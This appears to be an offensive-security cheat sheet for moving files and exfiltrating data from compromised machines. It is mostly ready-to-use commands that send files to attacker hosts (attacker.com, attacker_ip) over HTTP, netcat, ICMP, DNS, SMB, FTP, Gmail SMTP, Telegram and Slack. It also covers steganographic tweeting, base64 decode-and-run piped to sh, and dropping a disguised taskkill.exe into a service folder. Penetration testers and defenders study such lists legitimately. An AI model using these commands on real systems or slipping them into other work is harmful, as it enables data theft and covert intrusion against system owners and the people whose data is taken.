Basic Transfers (Upload / Download)
curl
# Download a file
curl http://attack_server/file.zip -o filename
# Upload a file
curl -T localfile.txt ftp://attack_server/upload/
wget
# Download from HTTP site
wget http://attack_server/file.zip -O filename
PowerShell
# Local copy across drives
Copy-Item -Path C:\source\path\file.txt -Destination D:\dest\path\text.txt
# Download file from URL
Invoke-WebRequest -Uri http://attack_server/file.zip -OutFile C:\path\to\save\file.zip
scp
# Upload
scp local_file.gz user@192.168.1.1:path/to/put/file
# Upload to Windows
scp local_file.gz user@192.168.1.1:"C:/path/to/put/file
# Upload using key auth
scp -i mykey.pem somefile.txt root@my.ec2.id.amazonaws.com:/
# Download
scp user@remoteserver:/root/filename.rar ./local/path
scp -P [port] user@remoteserver:/root/filename.rar ./local/path
netcat (nc)
# On the attacker machine (listening)
nc -lvp 4444 > received_file
# On the victim machine (sending)
nc attacker_ip 4444 < file_to_send
Python HTTP Server
# Serve files from the current directory (Python 3)
python3 -m http.server 8000
# Serve files from the current directory (Python 2)
python -m SimpleHTTPServer 8000Network Exfiltration
ICMP
# Send file data through ICMP packets
ping -c 1 -p $(cat file | xxd -p) target_ip
DNS
# Encode and send data via DNS requests
nslookup $(echo -n "data" | base64).domain.com attacker_ip
HTTP/S
# Exfiltrate via cURL
curl -X POST -d @file http://attacker.com/upload
# Exfiltrate via wget
wget --post-file=file http://attacker.com/upload
SMB
# Mount and copy data to remote SMB share
mount -t cifs //attacker_ip/share /mnt -o username=user,password=pass
cp file /mnt/
Fileless & Covert Channels
PowerShell
# Upload file via PowerShell web request
Invoke-WebRequest -Uri http://attacker.com/upload -Method POST -InFile file
DNS Tunnel (iodine)
# Set up a DNS tunnel for exfiltration
iodined -f -P password 10.0.0.1 attacker.com
FTP
# Send file via FTP
ftp attacker_ip
put file
Gmail API
# Send file content via email (Python example)
import smtplib
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login('attacker@gmail.com', 'password')
s.sendmail('attacker@gmail.com', 'receiver@gmail.com', open('file').read())
s.quit()
Data Encoding & Obfuscation
Base64
# Encode and decode a file
base64 file > file.b64
base64 -d file.b64 > file
# Decode + run in terminal
base64 -d file.enc | sh
# Decode + run, save output
base64 -d lp.enc | sh > linpeas_output.txt 2>&1
Hex
# Convert file to hex
xxd -p file > file.hex
# Convert hex back to original file
xxd -r -p file.hex > file
ROT13
# Encode and decode using ROT13
cat file | tr 'A-Za-z' 'N-ZA-Mn-za-m'
tar
# Create archive + compress from existing files
tar -czvf new_archive.tar.gz file1 file2
# List contents
tar -xf archive.tar
# Unpack
tar -xzvf archive.tar.gz
zip
# Create a zip archive
zip archive.zip file1 file2
# Unzip
unzip archive.zip
Cloud & Social Media Exfiltration
Google Drive API
# Upload file using Google Drive API (Python)
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
drive = GoogleDrive(gauth)
file = drive.CreateFile({'title': 'exfiltrated.txt'})
file.SetContentFile('file.txt')
file.Upload()
Twitter (Stego Exfiltration)
# Hide data in an image and tweet
steghide embed -cf image.jpg -ef file -p password
twitcli tweet -m "Check out my new pic!" -f image.jpg
Slack/Discord Bots
# Use a bot to send exfiltrated data
curl -F "file=@file" -F "channels=CHANNEL_ID" -H "Authorization: Bearer TOKEN" https://slack.com/api/files.upload
Telegram Bot
# Send data using a Telegram bot
curl -F "document=@file" https://api.telegram.org/botTOKEN/sendDocument?chat_id=CHAT_ID
Miscellaneous Techniques
Audio
# Convert file to audio tones for exfiltration
cat file | minimodem --tx 1200 > audio.wav
Bluetooth
# Send data via Bluetooth
rfcomm connect hci0 attacker_mac
cat file > /dev/rfcomm0
Covert Print Jobs
# Hide data in a print job
lp -o raw file
TODO
Download
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
nxc / crackmap
nxc smb --get-file/--put-file